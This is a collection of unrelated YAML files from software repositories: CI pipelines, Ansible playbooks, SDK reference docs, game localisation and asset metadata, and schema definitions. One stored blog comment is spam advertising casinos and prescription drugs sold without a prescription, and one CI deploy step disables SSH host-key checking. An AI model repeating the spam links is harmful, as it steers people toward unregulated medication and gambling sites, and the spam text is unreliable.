SAVE_PROG:0 "Spielstand ( $VALUE$% )"
RNW_PROG:0 "ZNW wird übertragen ( $VALUE$% )"
## OUTLINER ##
TRANSFER_IN_TRADE2:0 "$VAL|Y$¤-> $WHERE$"
## MSG_FILTERS ##
MSG_FILTER_DESELECT:0 "§YMarkierungen aufheben§!"
MSG_FILTER_BEST_GUESS:0 "§GEinschätzung§!"
MSG_FILTER_ENEMIES:0 "§RFeinde§!"
MSG_FILTER_ALLIES:0 "§BVerbündete§!"
MSG_FILTER_NEIGHBOURS:0 "§gNachbarn§!"
SORT_BY_NAME:1 "Name"
SORT_BY_SELECTED:0 "Auswahl"
## COUNTRY COURT VIEW ##
NO_HEIR:0 "§YKein legitimer Nachfolger§!"
## COUNTRY DIPLOMATIC VIEW ##
# Color keywords
FRIENDS:0 "§GFreunde§!"
FE_PLAYERS:0 "§YMitspieler§!"
LEDGER_CLEAR:0 "§OZurücksetzen§!"
## PROVINCE VIEW ##
PROVVIEW_OCCUPIED_BY_YOU:0 "§GVon Euch besetzt§!"
## PEACE VIEW ##
CLEAR_OFFER:0 "£no£ Angebot entfernen"
## MISCELLANEOUS ##
|
Royal_Eagle_UI/localisation/replace/RoyalEagleUI_l_german.yml
|
version: 2
jobs:
minitest:
docker:
- image: circleci/ruby:2.7.1-node-browsers-legacy
environment:
RAILS_ENV: test
TESTOPTS: "--ci-report --ci-dir=/tmp/test_reports/minitest"
# https://discuss.circleci.com/t/rails-app-cant-connect-to-postgres-server/13059
PGHOST: 127.0.0.1
PGUSER: root
- image: circleci/postgres:10.3
environment:
POSTGRES_USER: root
POSTGRES_DB: volunteer_test
steps:
- checkout
- restore_cache:
keys:
- v1-ruby-dependencies-{{ checksum "Gemfile.lock" }}
# fallback to using the latest cache if no exact match is found
- v1-ruby-dependencies-
- run:
name: install dependencies
command: |
gem install bundler -v 1.17.3
bundle install --local --jobs=4 --retry=3 --path vendor/bundle
- save_cache:
paths:
- ./vendor/bundle
key: v1-ruby-dependencies-{{ checksum "Gemfile.lock" }}
- run: bundle exec rake db:create db:schema:load
- run:
name: run unit tests
command: bundle exec rake test
- store_test_results:
path: /tmp/test_reports
rubocop:
docker:
- image: circleci/ruby:2.7.1-node-browsers
environment:
RAILS_ENV: development
TESTOPTS: "--ci-report --ci-dir=/tmp/rubocop_reports/"
steps:
- checkout
- restore_cache:
keys:
- v1-ruby-dependencies-{{ checksum "Gemfile.lock" }}
# fallback to using the latest cache if no exact match is found
- v1-ruby-dependencies-
- run:
name: install dependencies
command: |
gem install bundler -v 1.17.3
bundle install --local --jobs=4 --retry=3 --path vendor/bundle
- save_cache:
paths:
- ./vendor/bundle
key: v1-ruby-dependencies-{{ checksum "Gemfile.lock" }}
- run:
name: run Rubocop
command: bundle exec rubocop
- store_test_results:
path: /tmp/rubocop_reports
jest:
docker:
- image: circleci/node:12-stretch-browsers
steps:
- checkout
- restore_cache:
keys:
- yarn-packages-v2-{{ checksum "yarn.lock" }}
- run:
name: install dependencies
command: yarn install
- save_cache:
paths:
- ~/.cache/yarn
key: yarn-packages-v2-{{ checksum "yarn.lock" }}
- run:
name: run javascript tests
command: yarn test -- --ci --runInBand --reporters=default --reporters=jest-junit
- store_test_results:
path: /tmp/test_reports
workflows:
version: 2
test_suite:
jobs:
- minitest
- rubocop
- jest
|
.circleci/config.yml
|
---
- name: Setup any hypervisors
hosts: hypervisors
tasks:
- name: Install required packages
dnf:
name:
- bridge-utils
- libvirt-client
- python3-libvirt
- python3-lxml
- libvirt-daemon-kvm
- qemu-img
- qemu-kvm
- virt-install
- cloud-utils
- sshpass
state: latest
- name: Check if libvirt image_path exists
stat:
path: "{{ image_path }}"
register: st
- name: Create libvirt image_path exists
file:
path: "{{ image_path }}"
state: directory
owner: root
group: root
mode: "u=rwx,g=rwx,o=rx"
seuser: "system_u"
setype: "virt_var_lib_t"
register:
image_create
when:
- not st.stat.exists
- name: Allow libvirt to manage files in image_path
sefcontext:
target: "{{ image_path }}(/.*)?"
seuser: "system_u"
setype: "virt_var_lib_t"
state: present
when:
- image_create is changed
- name: Restart libvirtd
service:
name: libvirtd
state: restarted
- name: List libvirt pools
virt_pool:
command: list_pools
register: pool_list
- name: Define libvirt default pool
virt_pool:
command: define
name: default
xml: '{{ lookup("template", "templates/default_storage_xml.j2") }}'
when: '"default" not in pool_list.list_pools'
- name: Get libvirt default pool status
virt_pool:
command: status
name: default
register: default_pool
# Build a storage pool if it does not exist
- name: Build libvirt default pool
virt_pool:
command: build
name: default
when: 'default_pool.status not in "active"'
# Ensure that a pool is active (needs to be defined and built first)
- name: Start libvirt default pool
virt_pool:
state: active
name: default
when: 'default_pool.status not in "active"'
# Ensure that a given pool will be started at boot
- name: Enable autostart libvirt default pool
virt_pool:
autostart: yes
name: default
|
kata-nested-vm-host/ansible/playbook/hypervisor.yaml
|
_id: df96b9a0-418e-11ea-a28c-05b60d2563f6
message: >-
Early zla.psdg.hashtafak.github.io.swv.wm schizophrenia, coincide
[URL=http://bonusgambling-casino.space/#best-online-casino]online casino
review[/URL]
[URL=http://chesscoachcentral.com/product/trazodone/#trazodone-buy-online]buy
trazodone w not prescription[/URL]
[URL=http://csharp-eval.com/canadian-pharmacy-cialis-20mg/#cialis-pharmacy]on
line pharmacy[/URL]
[URL=http://srqypg.com/product/jelly-pack-15/#jelly-pack-15-generic-pills]generic
jelly pack 15 at walmart[/URL]
[URL=http://csharp-eval.com/rumalaya-fort/#rumalaya-fort]non prescription
rumalaya fort[/URL]
[URL=http://russianpoetsfund.com/product/pristiq/#pristiq]pristiq[/URL]
[URL=http://bigskilletlive.com/zithromax/#zithromax-antibiotic]aminoglycosides
and azithromycin[/URL] progenitors dispensed illness, <a
href="http://bonusgambling-casino.space/#online-casino-wagering">online
casinos</a> <a
href="http://chesscoachcentral.com/product/trazodone/#lowest-price-on-generic-trazodone">trazodone</a>
<a
href="http://csharp-eval.com/canadian-pharmacy-cialis-20mg/#canadian-pharmacy-cialis-20mg">canadapharmacy.com</a>
<a
href="http://srqypg.com/product/jelly-pack-15/#jelly-pack-15-buy-in-canada">jelly
pack 15 buy in canada</a> <a
href="http://csharp-eval.com/rumalaya-fort/#non-prescription-rumalaya-fort">rumalaya
fort online canada</a> <a
href="http://russianpoetsfund.com/product/pristiq/#cost-of-pristiq-tablets">pristiq
without dr prescription usa</a> <a
href="http://bigskilletlive.com/zithromax/#buy-azithromycin">buy
azithromycin</a> bathing allay
http://bonusgambling-casino.space/#best-online-casino-gambling casino games
http://chesscoachcentral.com/product/trazodone/#buy-trazodone-w-not-prescription
trazodone coupons
http://csharp-eval.com/canadian-pharmacy-cialis-20mg/#pharmacy on line
pharmacy on line pharmacy
http://srqypg.com/product/jelly-pack-15/#pharmacy-prices-for-jelly-pack-15
jelly pack 15 online
http://csharp-eval.com/rumalaya-fort/#rumalaya-fort-without-a-prescription
rumalaya fort
http://russianpoetsfund.com/product/pristiq/#buy-pristiq-online-canada pristiq
no prescription http://bigskilletlive.com/zithromax/#zithromax-antibiotic
zithromax online azax ranbaxy 250mg azithromycin basal hepatocellular noticed.
name: ogpatini
email: dd7324a17215c198192d09c7bba24a4c
url: 'http://bonusgambling-casino.space/'
hidden: ''
date: '2020-01-28T05:27:28.315Z'
|
_data/comments/dear-diary/comment-1580189248316.yml
|
uid: "com.azure.cosmos.models.CosmosContainerProperties.setDefaultTimeToLiveInSeconds*"
fullName: "com.azure.cosmos.models.CosmosContainerProperties.setDefaultTimeToLiveInSeconds"
name: "setDefaultTimeToLiveInSeconds"
nameWithType: "CosmosContainerProperties.setDefaultTimeToLiveInSeconds"
members:
- uid: "com.azure.cosmos.models.CosmosContainerProperties.setDefaultTimeToLiveInSeconds(java.lang.Integer)"
fullName: "com.azure.cosmos.models.CosmosContainerProperties.setDefaultTimeToLiveInSeconds(Integer timeToLive)"
name: "setDefaultTimeToLiveInSeconds(Integer timeToLive)"
nameWithType: "CosmosContainerProperties.setDefaultTimeToLiveInSeconds(Integer timeToLive)"
summary: "Sets the container's default time-to-live value.\n\nThe default time-to-live value on a container is an optional property. If set, the items within the container expires after the specified number of seconds since their last write time. The value of this property should be one of the following:\n\nnull - indicates evaluation of time-to-live is disabled and items within the container will never expire, regardless whether individual items have their time-to-live set.\n\nnonzero positive integer - indicates the default time-to-live value for all items within the container. This value can be overridden by individual items time-to-live value.\n\n\\-1 - indicates by default all items within the container never expire. This value can be overridden by individual items time-to-live value."
parameters:
- description: "the default time-to-live value in seconds."
name: "timeToLive"
type: "<xref href=\"java.lang.Integer?alt=java.lang.Integer&text=Integer\" data-throw-if-not-resolved=\"False\" />"
syntax: "public CosmosContainerProperties setDefaultTimeToLiveInSeconds(Integer timeToLive)"
returns:
description: "the CosmosContainerProperties."
type: "<xref href=\"com.azure.cosmos.models.CosmosContainerProperties?alt=com.azure.cosmos.models.CosmosContainerProperties&text=CosmosContainerProperties\" data-throw-if-not-resolved=\"False\" />"
type: "method"
metadata: {}
package: "com.azure.cosmos.models"
artifact: com.azure:azure-cosmos:4.4.0-beta.1
|
preview/docs-ref-autogen/com.azure.cosmos.models.CosmosContainerProperties.setDefaultTimeToLiveInSeconds.yml
|
--- !<MODEL>
contentType: "MODEL"
firstIndex: "2018-12-25 17:57"
game: "Unreal Tournament"
name: "Genestealer"
author: "Unknown"
description: "None"
releaseDate: "2000-09"
attachments:
- type: "IMAGE"
name: "genestealer_shot_5.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Models/G/genestealer_shot_5.png"
- type: "IMAGE"
name: "genestealer_shot_3.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Models/G/genestealer_shot_3.png"
- type: "IMAGE"
name: "genestealer_shot_1.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Models/G/genestealer_shot_1.png"
- type: "IMAGE"
name: "genestealer_shot_6.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Models/G/genestealer_shot_6.png"
- type: "IMAGE"
name: "genestealer_shot_4.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Models/G/genestealer_shot_4.png"
- type: "IMAGE"
name: "genestealer_shot_2.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Models/G/genestealer_shot_2.png"
originalFilename: "genestealer.zip"
hash: "b419d1174cf1886976e4b65a35e2b4a59e650bb7"
fileSize: 1759135
files:
- name: "genest.u"
fileSize: 1537248
hash: "515d13d5b96db073de7096450d0c9ac8ebc2f478"
- name: "GenestSkins.utx"
fileSize: 578643
hash: "1bf51afee3ecb22587b59e4fc9bf886398ddb9b0"
- name: "GenestealerModel.umod"
fileSize: 2153253
hash: "052c1fcba3d15d9907791fadf7926d17a01ab135"
otherFiles: 10
dependencies: {}
downloads:
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament/Models/G/genestealer.zip"
main: true
repack: false
state: "OK"
- url: "http://uttexture.com/UT/Downloads/Models/ModelsG/genestealer.zip"
main: false
repack: false
state: "OK"
- url: "http://medor.no-ip.org/index.php?dir=Skins/&file=genestealer.zip"
main: false
repack: false
state: "OK"
- url: "http://www.ut-files.com/index.php?dir=Skins/SkinsG/&file=genestealer.zip"
main: false
repack: false
state: "OK"
- url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament/Models/G/b/4/19d117/genestealer.zip"
main: false
repack: false
state: "OK"
- url: "http://ut-files.com/index.php?dir=Models/ModelsG/&file=genestealer.zip"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament/Models/G/b/4/19d117/genestealer.zip"
main: false
repack: false
state: "OK"
deleted: false
models:
- "Genestealer"
skins: []
|
content/Unreal Tournament/Models/G/b/4/19d117/genestealer_[b419d117].yml
|
nameWithType: VirtualMachineScaleSet.UpdateStages.WithPrimaryLoadBalancer.withExistingPrimaryInternetFacingLoadBalancer
type: method
members:
- fullName: com.microsoft.azure.management.compute.VirtualMachineScaleSet.UpdateStages.WithPrimaryLoadBalancer.withExistingPrimaryInternetFacingLoadBalancer(LoadBalancer loadBalancer)
name: withExistingPrimaryInternetFacingLoadBalancer(LoadBalancer loadBalancer)
nameWithType: VirtualMachineScaleSet.UpdateStages.WithPrimaryLoadBalancer.withExistingPrimaryInternetFacingLoadBalancer(LoadBalancer loadBalancer)
parameters:
- description: <p>the primary Internet-facing load balancer </p>
name: loadBalancer
type: <xref href="com.microsoft.azure.management.network.LoadBalancer?alt=com.microsoft.azure.management.network.LoadBalancer&text=LoadBalancer" data-throw-if-not-resolved="False"/>
returns:
description: <p>the next stage of the update </p>
type: <xref href="com.microsoft.azure.management.compute.VirtualMachineScaleSet.UpdateStages.WithPrimaryInternetFacingLoadBalancerBackendOrNatPool?alt=com.microsoft.azure.management.compute.VirtualMachineScaleSet.UpdateStages.WithPrimaryInternetFacingLoadBalancerBackendOrNatPool&text=VirtualMachineScaleSet.UpdateStages.WithPrimaryInternetFacingLoadBalancerBackendOrNatPool" data-throw-if-not-resolved="False"/>
summary: >-
<p>Specifies the load balancer to be used as the Internet-facing load balancer for the virtual machines in the scale set. </p>
<p>This will replace the current Internet-facing load balancer associated with the virtual machines in the scale set (if any). By default all the backend and inbound NAT pool of the load balancer will be associated with the primary network interface of the virtual machines unless a subset of them is selected in the next stages </p>
syntax: public WithPrimaryInternetFacingLoadBalancerBackendOrNatPool withExistingPrimaryInternetFacingLoadBalancer(LoadBalancer loadBalancer)
uid: com.microsoft.azure.management.compute.VirtualMachineScaleSet.UpdateStages.WithPrimaryLoadBalancer.withExistingPrimaryInternetFacingLoadBalancer(LoadBalancer)
uid: com.microsoft.azure.management.compute.VirtualMachineScaleSet.UpdateStages.WithPrimaryLoadBalancer.withExistingPrimaryInternetFacingLoadBalancer*
fullName: com.microsoft.azure.management.compute.VirtualMachineScaleSet.UpdateStages.WithPrimaryLoadBalancer.withExistingPrimaryInternetFacingLoadBalancer
name: withExistingPrimaryInternetFacingLoadBalancer(LoadBalancer loadBalancer)
package: com.microsoft.azure.management.compute
metadata: {}
|
legacy/docs-ref-autogen/com.microsoft.azure.management.compute.VirtualMachineScaleSet.UpdateStages.WithPrimaryLoadBalancer.withExistingPrimaryInternetFacingLoadBalancer.yml
|
version: 2.1
executors:
docker:
environment:
API_IMAGE_NAME: shellhubio/devicehub-api
SSH_IMAGE_NAME: shellhubio/devicehub-ssh
WS_IMAGE_NAME: shellhubio/devicehub-ws
UI_IMAGE_NAME: shellhubio/devicehub-ui
GATEWAY_IMAGE_NAME: shellhubio/devicehub-gateway
docker:
- image: circleci/buildpack-deps:stretch
jobs:
build:
executor: docker
steps:
- checkout
- setup_remote_docker
- run:
name: Build API microservice
working_directory: api
command: docker build -t $API_IMAGE_NAME:latest .
- run:
name: Build SSH microservice
working_directory: ssh
command: docker build -t $SSH_IMAGE_NAME:latest .
- run:
name: Build WS microservice
working_directory: ws
command: docker build -t $WS_IMAGE_NAME:latest .
- run:
name: Build UI microservice
working_directory: ui
command: docker build -t $UI_IMAGE_NAME:latest .
- run:
name: Build API Gateway microservice
working_directory: gateway
command: docker build -t $GATEWAY_IMAGE_NAME:latest .
- run:
name: Archive Docker images
command: |
docker save $(docker images | awk '{if ($1 ~ /\/devicehub-/) print $3}') -o images.tar
docker images | awk '{if ($1 ~ /\/devicehub-/) print $1 " " $3}' > tags.txt
- persist_to_workspace:
root: .
paths:
- ./images.tar
- ./tags.txt
push:
executor: docker
steps:
- setup_remote_docker
- attach_workspace:
at: /tmp/workspace
- run:
name: Setup DockerHub credentials
command: echo "$DOCKERHUB_PASSWORD" | docker login -u "$DOCKERHUB_USERNAME" --password-stdin
- run:
name: Load archived Docker images
command: |
docker load -i /tmp/workspace/images.tar
awk '{ print "docker tag "$2" "$1"" | "/bin/sh"}' /tmp/workspace/tags.txt
- run:
name: Publish API microservice image
command: docker push $API_IMAGE_NAME:latest
- run:
name: Publish SSH microservice image
command: docker push $SSH_IMAGE_NAME:latest
- run:
name: Publish WS microservice image
command: docker push $WS_IMAGE_NAME:latest
- run:
name: Publish UI microservice image
command: docker push $UI_IMAGE_NAME:latest
- run:
name: Publish API Gateway microservice image
command: docker push $GATEWAY_IMAGE_NAME:latest
deploy:
executor: docker
steps:
- add_ssh_keys:
fingerprints:
- "6f:33:16:6f:5e:bf:4b:bd:af:e4:70:c6:60:76:b2:b7"
- run:
name: Update containers
command: |
ssh $DEPLOY_HOST -o "StrictHostKeyChecking no" -o "LogLevel=error" -l root -p 2222 'docker-compose pull; docker-compose up -d'
workflows:
version: 2
master:
jobs:
- build:
filters:
branches:
only: master
- push:
requires:
- build
filters:
branches:
only: master
- deploy:
requires:
- push
filters:
branches:
only: master
|
.circleci/config.yml
|
$linkedData:
term: CargoLineItem
'@id': https://w3id.org/traceability#CargoLineItem
title: Cargo Line Item
description: Identifies the specific details of packages within a cargo item.
type: object
properties:
type:
oneOf:
- type: array
- type: string
enum:
- CargoLineItem
cargoLineItemID:
title: cargoLineItemID
description: >-
Identifies the cargo line item (package) within the cargo. The cargo line
item ID is provided by the shipper and is used to define the stuffing.
Cargo line items belonging to the same cargo items are stuffed in the same
container.
type: string
$linkedData:
term: cargoLineItemID
'@id': >-
https://api.swaggerhub.com/domains/dcsaorg/DCSA_DOMAIN/1.0.1#/components/schemas/cargoLineItemID
shippingMarks:
title: shippingMarks
description: >-
The identifying details of a package or the actual markings that appear on
the package(s). This information is provided by the shipper.
type: string
$linkedData:
term: shippingMarks
'@id': >-
https://service.unece.org/trade/uncefact/vocabulary/uncefact/#physicalShippingMarks
descriptionOfGoods:
title: Description of Goods
description: >-
The cargo description are details which accurately and properly describe
the cargo being shipped in the container(s) as provided by the shipper.
type: string
$linkedData:
term: descriptionOfGoods
'@id': >-
https://api.swaggerhub.com/domains/dcsaorg/DCSA_DOMAIN/1.0.1#/components/schemas/descriptionOfGoods
HSCode:
title: HS Code
description: Used by customs to classify the product being shipped.
type: string
$linkedData:
term: HSCode
'@id': >-
https://api.swaggerhub.com/domains/dcsaorg/DCSA_DOMAIN/1.0.1#/components/schemas/HSCode
required:
- shippingMarks
example: |-
{
"type": "CargoLineItem",
"cargoLineItemID": "3312591",
"shippingMarks": "Premium break pads"
}
|
docs/openapi/components/schemas/common/CargoLineItem.yml
|
uid: "com.azure.storage.file.share.models.ShareFileCopyInfo.ShareFileCopyInfo*"
fullName: "com.azure.storage.file.share.models.ShareFileCopyInfo.ShareFileCopyInfo"
name: "ShareFileCopyInfo"
nameWithType: "ShareFileCopyInfo.ShareFileCopyInfo"
members:
- uid: "com.azure.storage.file.share.models.ShareFileCopyInfo.ShareFileCopyInfo(java.lang.String,java.lang.String,com.azure.storage.file.share.models.CopyStatusType,java.lang.String,java.time.OffsetDateTime,java.lang.String)"
fullName: "com.azure.storage.file.share.models.ShareFileCopyInfo.ShareFileCopyInfo(String copySource, String copyId, CopyStatusType copyStatus, String eTag, OffsetDateTime lastModified, String error)"
name: "ShareFileCopyInfo(String copySource, String copyId, CopyStatusType copyStatus, String eTag, OffsetDateTime lastModified, String error)"
nameWithType: "ShareFileCopyInfo.ShareFileCopyInfo(String copySource, String copyId, CopyStatusType copyStatus, String eTag, OffsetDateTime lastModified, String error)"
summary: "Creates an instance of copy information about a specific File."
parameters:
- description: "The url of the source file."
name: "copySource"
type: "<xref href=\"java.lang.String?alt=java.lang.String&text=String\" data-throw-if-not-resolved=\"False\" />"
- description: "String identifier for this copy operation."
name: "copyId"
type: "<xref href=\"java.lang.String?alt=java.lang.String&text=String\" data-throw-if-not-resolved=\"False\" />"
- description: "State of the copy operation with these values:\n <ul>\n <li>success: the copy completed successfully.</li>\n <li>pending: the copy is still in progress.</li>\n </ul>"
name: "copyStatus"
type: "<xref href=\"com.azure.storage.file.share.models.CopyStatusType?alt=com.azure.storage.file.share.models.CopyStatusType&text=CopyStatusType\" data-throw-if-not-resolved=\"False\" />"
- description: "If the copy is completed, contains the ETag of the destination file. If the copy is not complete,\n contains the ETag of the empty file created at the start of the copy."
name: "eTag"
type: "<xref href=\"java.lang.String?alt=java.lang.String&text=String\" data-throw-if-not-resolved=\"False\" />"
- description: "The date/time that the copy operation to the destination file completed."
name: "lastModified"
type: "<xref href=\"java.time.OffsetDateTime?alt=java.time.OffsetDateTime&text=OffsetDateTime\" data-throw-if-not-resolved=\"False\" />"
- description: "An error message for the copy operation. <code>null</code> if there are no errors."
name: "error"
type: "<xref href=\"java.lang.String?alt=java.lang.String&text=String\" data-throw-if-not-resolved=\"False\" />"
syntax: "public ShareFileCopyInfo(String copySource, String copyId, CopyStatusType copyStatus, String eTag, OffsetDateTime lastModified, String error)"
type: "constructor"
metadata: {}
package: "com.azure.storage.file.share.models"
artifact: com.azure:azure-storage-file-share:12.8.0
|
docs-ref-autogen/com.azure.storage.file.share.models.ShareFileCopyInfo.ShareFileCopyInfo.yml
|
name: Tests
on:
push:
pull_request:
jobs:
test:
name: ${{ matrix.redmine }} ruby-${{ matrix.ruby }}
runs-on: ubuntu-latest
strategy:
matrix:
ruby: ['2.7', '2.6', '3.0']
redmine: ['4.1-stable', '4.2-stable', 'master']
exclude:
- ruby: '2.7'
redmine: 4.1-stable
- ruby: '3.0'
redmine: 4.1-stable
- ruby: '3.0'
redmine: 4.2-stable
fail-fast: false
services:
postgres:
image: postgres:14
env:
POSTGRES_USER: postgres
POSTGRES_PASSWORD: <PASSWORD>
ports:
- 5432:5432
options: >-
--health-cmd pg_isready
--health-interval 10s
--health-timeout 5s
--health-retries 5
steps:
- name: Checkout Redmine
uses: actions/checkout@v2
with:
repository: redmine/redmine
ref: ${{ matrix.redmine }}
path: redmine
- name: Checkout redmine_lightbox
uses: actions/checkout@v2
with:
repository: AlphaNodes/redmine_lightbox
path: redmine/plugins/redmine_lightbox
- name: Update package archives
run: sudo apt-get update --yes --quiet
- name: Install package dependencies
run: >
sudo apt-get install --yes --quiet
build-essential
cmake
libicu-dev
libpq-dev
- name: Setup Ruby
uses: ruby/setup-ruby@v1
with:
ruby-version: ${{ matrix.ruby }}
bundler-cache: true # runs 'bundle install' and caches installed gems automatically
- name: Prepare Redmine source
working-directory: redmine
run: |
cp plugins/redmine_lightbox/test/support/database.yml config/
cp plugins/redmine_lightbox/test/support/configuration.yml config/
- name: Install Ruby dependencies
working-directory: redmine
run: |
bundle config set --local without 'development'
bundle install --jobs=4 --retry=3
- name: Run Redmine rake tasks
env:
RAILS_ENV: test
working-directory: redmine
run: |
bundle exec rake generate_secret_token
bundle exec rake db:create db:migrate
bundle exec rake db:test:prepare
- name: Run tests
env:
RAILS_ENV: test
working-directory: redmine
run: bundle exec rake redmine:plugins:test NAME=redmine_lightbox RUBYOPT="-W0"
|
.github/workflows/tests.yml
|
AllCops:
TargetRubyVersion: 2.3
Exclude:
# This file is autogenerated by Rails, we shouldn't worry about changing its
# format.
- 'db/schema.rb'
# Some people may choose to install gems into vendor/bundle/, which will
# break Rubocop. Ignore it.
- 'vendor/**/*'
- 'bundler_cache/**/*'
# Disable line length checks
Metrics/LineLength:
Enabled: false
# Disable class length checks
Metrics/ClassLength:
Enabled: false
# Disable method length checks
Metrics/MethodLength:
Enabled: false
# Disable block length checks
Metrics/BlockLength:
Enabled: false
# Disable Assignment Branch Condition size check
Metrics/AbcSize:
Enabled: false
# Disable check for methods requiring more than 5 parameters.
Metrics/ParameterLists:
Enabled: false
# Disable check for cyclomatic complexity. While we'll certainly have to
# refactor our code as we code, it's just a nuisance right now.
Metrics/CyclomaticComplexity:
Enabled: false
# Same deal as above, except for perceived complexity.
Metrics/PerceivedComplexity:
Enabled: false
# Disable for built-in Rails scripts in bin/ because it breaks them.
Style/MixinUsage:
Exclude:
- 'bin/**/*'
# Don't worry about having top-level class documentation comments for every
# class. It'd be a nuisance to do this on all of the generated Rails classes.
Documentation:
Enabled: false
# Exclude all tests from this check beacuse this makes a core part of Rspec's
# DSL ugly.
#
# Example: the following test would be invalid with this check enabled.
#
# expect { User.create }.to change { User.count }.by 1
#
Lint/AmbiguousBlockAssociation:
Exclude:
- 'spec/**/*'
# Run those Rails cops!
Rails:
Enabled: true
# Disable preference for has_many :through over has_and_belongs_to_many. They're
# different types of relationships and Rails attaches different helper methods
# for each, not sure why Rubocop has a preference for this by default.
Rails/HasAndBelongsToMany:
Enabled: false
# Disable inverse_of check because it's automatically implicitly added in recent
# Rails versions
Rails/InverseOf:
Enabled: false
# Don't force :dependent to be specified beacuse :nullify is a sane default.
Rails/HasManyOrHasOneDependent:
Enabled: false
# Don't force usage of ApplicationRecord instead of ActiveRecord::Base in Rails
# migrations because migrations shouldn't depend on application code.
Rails/ApplicationRecord:
Exclude:
- 'db/migrate/**'
|
.rubocop.yml
|
name: ABI Test
on:
schedule:
# run daily 20:00 on main branch
- cron: '0 20 * * *'
push:
branches:
- prerelease_test
jobs:
abi_test:
name: ABI Test ${{ matrix.type}} PG${{ matrix.pg }}
runs-on: ubuntu-latest
strategy:
fail-fast: false
matrix:
pg: ["12.8","13.4","14.0"]
type: ["min","max"]
steps:
- name: Checkout TimescaleDB
uses: actions/checkout@v2
- name: Build extension
run: |
if [[ "${{ matrix.type }}" == "min" ]]; then
PG_MAJOR=$(echo "${{matrix.pg}}" | cut -c 1-2 )
# this will be latest released version
BUILDER_IMAGE="postgres:${PG_MAJOR}-alpine"
else
BUILDER_IMAGE="postgres:${{matrix.pg}}-alpine"
fi
docker run -i --rm -v $(pwd):/mnt ${BUILDER_IMAGE} bash <<"EOF"
apk add cmake gcc make build-base krb5-dev openssl-dev > /dev/null
cd /mnt
BUILD_DIR=build_abi BUILD_FORCE_REMOVE=true ./bootstrap
make -C build_abi install
mkdir -p build_abi/install_ext build_abi/install_lib
cp `pg_config --sharedir`/extension/timescaledb*.{control,sql} build_abi/install_ext
cp `pg_config --pkglibdir`/timescaledb*.so build_abi/install_lib
EOF
- name: Run tests
run: |
if [[ "${{ matrix.type }}" == "min" ]]; then
TEST_IMAGE="postgres:${{matrix.pg}}-alpine"
else
PG_MAJOR=$(echo "${{matrix.pg}}" | cut -c 1-2 )
# this will be latest released version
TEST_IMAGE="postgres:${PG_MAJOR}-alpine"
fi
docker run -i --rm -v $(pwd):/mnt ${TEST_IMAGE} bash <<"EOF"
apk add cmake gcc make build-base krb5-dev openssl-dev sudo > /dev/null
cd /mnt
cp build_abi/install_ext/* `pg_config --sharedir`/extension/
cp build_abi/install_lib/* `pg_config --pkglibdir`
chown -R postgres /mnt
set -o pipefail
sudo -u postgres make -C build_abi -k regresscheck regresscheck-t regresscheck-shared IGNORES="memoize" | tee installcheck.log
EOF
- name: Show regression diffs
if: always()
id: collectlogs
run: |
sudo chmod a+rw .
sudo find . -name regression.diffs -exec cat {} + > regression.log
sudo find . -name postmaster.log -exec cat {} + > postgres.log
if [[ -s regression.log ]]; then echo "::set-output name=regression_diff::true"; fi
grep -e 'FAILED' -e 'failed (ignored)' installcheck.log || true
cat regression.log
- name: Save regression diffs
if: always() && steps.collectlogs.outputs.regression_diff == 'true'
uses: actions/upload-artifact@v2
with:
name: Regression diff ABI Breakage ${{ matrix.type }} PG${{ matrix.pg }}
path: regression.log
- name: Save postmaster.log
if: always()
uses: actions/upload-artifact@v2
with:
name: PostgreSQL log ABI Breakage ${{ matrix.type }} PG${{ matrix.pg }}
path: postgres.log
|
.github/workflows/abi.yaml
|
---
#| Check Password
- name: private-keys - Check if Password Required
stat:
path: '{{ item.ssh_key_path | d(ssh_home_path + item.owner + ssh_key_path) }}/{{ item.key_name | d(ssh_keys_key_name) }}'
register: _ssh_keystate
when: (item.password_protected is defined and item.password_protected | bool) and
(ssh_password == '' and (not item.password is defined or item.password == ''))
with_flattened:
- '{{ ssh_private_keys }}'
- '{{ ssh_host_private_keys }}'
- '{{ ssh_group_private_keys }}'
- name: private-keys - Check if Key Already Exists
fail:
msg: 'Password required, not provided: User - {{ item.stat }}'
when: ((item.stat is defined and not item.stat.exists) and
(item.skipped is undefined))
with_items:
- '{{ _ssh_keystate.results }}'
#| Generate Private Key(s)
- name: private-keys - Generate Password-less Private Key(s)
shell: |
if [ ! -f {{ item.ssh_key_path | d(ssh_home_path + item.owner + ssh_key_path) }}/{{ item.key_name | d(ssh_key_name) }} ] ; then
ssh-keygen -t rsa -N "" \
-f {{ item.ssh_key_path | d(ssh_home_path + item.owner + ssh_key_path) }}/{{ item.key_name | d(ssh_key_name) }}
fi
args:
creates: '{{ item.ssh_key_path | d(ssh_home_path + item.owner + ssh_key_path) }}/{{ item.key_name | d(ssh_key_name) }}'
when: not item.password_protected is defined or not (item.password_protected | bool)
with_flattened:
- '{{ ssh_private_keys }}'
- '{{ ssh_host_private_keys }}'
- '{{ ssh_group_private_keys }}'
- name: private-keys - Generate Protected Private Key(s)
shell: |
if [ ! -f {{ item.ssh_key_path | d(ssh_home_path + item.owner + ssh_key_path) }}/{{ item.key_name | d(ssh_key_name) }} ] ; then
ssh-keygen -t rsa -N {{ item.password | d(ssh_password) }} \
-f {{ item.ssh_key_path | d(ssh_home_path + item.owner + ssh_key_path) }}/{{ item.key_name | d(ssh_key_name) }}
fi
args:
creates: '{{ item.ssh_key_path | d(ssh_home_path + item.owner + ssh_key_path) }}/{{ item.key_name | d(ssh_key_name) }}'
when: item.password_protected is defined and (item.password_protected | bool)
with_flattened:
- '{{ ssh_private_keys }}'
- '{{ ssh_host_private_keys }}'
- '{{ ssh_group_private_keys }}'
#| Verify File Permissions
- name: private-keys - Verify Private Key Permissions
file:
path: '{{ item.ssh_key_path | d(ssh_home_path + item.owner + ssh_key_path) }}/{{ item.key_name | d(ssh_key_name) }}'
state: file
owner: '{{ item.owner }}'
